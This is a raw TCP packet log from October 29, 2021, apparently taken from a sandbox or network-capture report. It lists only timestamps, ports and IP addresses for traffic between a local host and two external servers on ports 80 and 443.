Oct 29, 2021 20:49:58.033157110 CEST	80	49801	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:58.033215046 CEST	49801	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:58.035851955 CEST	80	49801	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:58.035883904 CEST	80	49801	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:58.035953999 CEST	49801	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:58.035980940 CEST	80	49801	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:58.036007881 CEST	80	49801	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:58.036035061 CEST	80	49801	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:58.036056042 CEST	49801	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:58.036077976 CEST	80	49801	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:58.036104918 CEST	80	49801	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:58.036120892 CEST	49801	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:58.036144972 CEST	80	49801	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:58.036185980 CEST	49801	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:58.087039948 CEST	80	49801	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:58.087080956 CEST	80	49801	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:58.087105036 CEST	80	49801	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:58.087199926 CEST	49801	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:58.087239027 CEST	80	49801	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:58.087261915 CEST	80	49801	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:58.087285042 CEST	49801	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:58.087296009 CEST	80	49801	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:58.087320089 CEST	80	49801	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:58.087342024 CEST	80	49801	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:58.087352991 CEST	49801	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:58.087378025 CEST	80	49801	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:58.087399006 CEST	49801	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:58.087409019 CEST	80	49801	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:58.087430954 CEST	80	49801	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:58.087450981 CEST	49801	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:58.087462902 CEST	80	49801	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:58.087486029 CEST	80	49801	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:58.087506056 CEST	49801	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:58.087516069 CEST	80	49801	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:58.087539911 CEST	80	49801	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:58.087559938 CEST	49801	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:58.087570906 CEST	80	49801	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:58.087593079 CEST	80	49801	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:58.087615013 CEST	80	49801	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:58.087637901 CEST	80	49801	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:58.087661982 CEST	80	49801	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:58.087672949 CEST	49801	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:58.087696075 CEST	80	49801	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:58.087704897 CEST	49801	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:58.087727070 CEST	80	49801	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:58.087749004 CEST	80	49801	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:58.087774038 CEST	80	49801	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:58.087780952 CEST	49801	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:58.087801933 CEST	80	49801	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:58.087816954 CEST	49801	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:58.087835073 CEST	80	49801	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:58.087857962 CEST	80	49801	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:58.087878942 CEST	49801	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:58.087893009 CEST	80	49801	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:58.087915897 CEST	80	49801	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:58.087929964 CEST	49801	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:58.087946892 CEST	80	49801	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:58.087966919 CEST	80	49801	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:58.087981939 CEST	49801	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:58.087997913 CEST	80	49801	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:58.088021040 CEST	80	49801	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:58.088038921 CEST	49801	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:58.088068008 CEST	80	49801	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:58.088113070 CEST	80	49801	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:58.088119030 CEST	49801	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:58.088140011 CEST	80	49801	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:58.088160992 CEST	80	49801	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:58.088177919 CEST	49801	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:58.088191986 CEST	80	49801	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:58.088212013 CEST	80	49801	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:58.088229895 CEST	49801	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:58.088244915 CEST	80	49801	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:58.088280916 CEST	49801	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:58.093149900 CEST	80	49801	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:58.093185902 CEST	80	49801	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:58.093276024 CEST	49801	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:58.093413115 CEST	49801	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:58.146811962 CEST	80	49801	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:59.966918945 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.008873940 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.011647940 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.011768103 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.011820078 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.011847973 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.011853933 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.011869907 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.011893988 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.011934042 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.011976957 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.011977911 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.011992931 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.012044907 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.012059927 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.012106895 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.012142897 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.012150049 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.012162924 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.012211084 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.012212038 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.012226105 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.012289047 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.012295008 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.012306929 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.012373924 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.012383938 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.012397051 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.012438059 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.012444019 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.012454033 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.012501001 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.012507915 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.012520075 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.012564898 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.012567997 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.012578964 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.012636900 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.012638092 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.012649059 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.012701035 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.012715101 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.012728930 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.012764931 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.012773991 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.012783051 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.012823105 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.012844086 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.012871027 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.012912989 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.012918949 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.012931108 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.012972116 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.012995005 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.013005018 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.013045073 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.013051033 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.013062954 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.013106108 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.013117075 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.013128996 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.013170004 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.013185024 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.013195992 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.013221025 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.013279915 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.029031038 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.029139042 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.029704094 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.029767036 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.029798985 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.029812098 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.029828072 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.029840946 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.029895067 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.029901028 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.029916048 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.029947996 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.029959917 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.029998064 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.030002117 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.030011892 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.030047894 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.030061007 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.030108929 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.030117035 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.030142069 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.030164957 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.030174017 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.030189991 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.030200005 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.030231953 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.030242920 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.030256033 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.030303955 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.030306101 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.030317068 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.030360937 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.030390978 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.030400038 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.030411005 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.030417919 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.030471087 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.030482054 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.030498028 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.030539036 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.030575991 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.030585051 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.030592918 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.030622005 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.047605038 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.047681093 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.047719002 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.047738075 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.047758102 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.047770023 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.047791004 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.047799110 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.047815084 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.047827959 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.047867060 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.047903061 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.047914028 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.047928095 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.047935963 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.047981024 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.047982931 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.047996044 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.048028946 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.048032045 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.048041105 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.048074961 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.048084021 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.048095942 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.048127890 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.048130035 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.048142910 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.048175097 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.048186064 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.048193932 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.048202038 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.048226118 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.048230886 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.048268080 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.048271894 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.048283100 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.048306942 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.048312902 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.048351049 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.048361063 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.048371077 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.048392057 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.048399925 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.048428059 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.048429966 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.048441887 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.048480988 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.048484087 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.048496962 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.048537016 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.048557997 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.048574924 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.048584938 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.048599005 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.048623085 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.048630953 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.048644066 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.048666000 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.048693895 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.048700094 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.048718929 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.048742056 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.048749924 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.048763037 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.048774958 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.048819065 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.048825026 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.048868895 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.048872948 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.048960924 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.049020052 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.049052954 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.049068928 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.049176931 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.049185991 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.049252033 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.049263954 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.049460888 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.049478054 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.049560070 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.049806118 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.049916983 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.050007105 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.050033092 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.050162077 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.050173044 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.050223112 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.050259113 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.050293922 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.050354958 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.051316023 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.051335096 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.051353931 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.051445007 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.051455975 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.051471949 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.051496983 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.051503897 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.051556110 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.051590919 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.052340984 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.054572105 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.066056013 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.066090107 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.066179037 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.066203117 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.066294909 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.066324949 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.066359997 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.066370010 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.066396952 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.066585064 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.066615105 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.066657066 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.066664934 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.066687107 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.066838980 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.066865921 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.066910028 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.066917896 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.066951990 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.067138910 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.067169905 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.067223072 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.067234039 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.067265987 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.067389011 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.067410946 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.067452908 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.067461014 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.067481041 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.067662001 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.067687035 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.067732096 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.067743063 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.067781925 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.067964077 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.067987919 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.068025112 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.068034887 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.068068027 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.068275928 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.068298101 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.068344116 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.068353891 CEST	443	49800	162.159.130.233	192.168.2.4
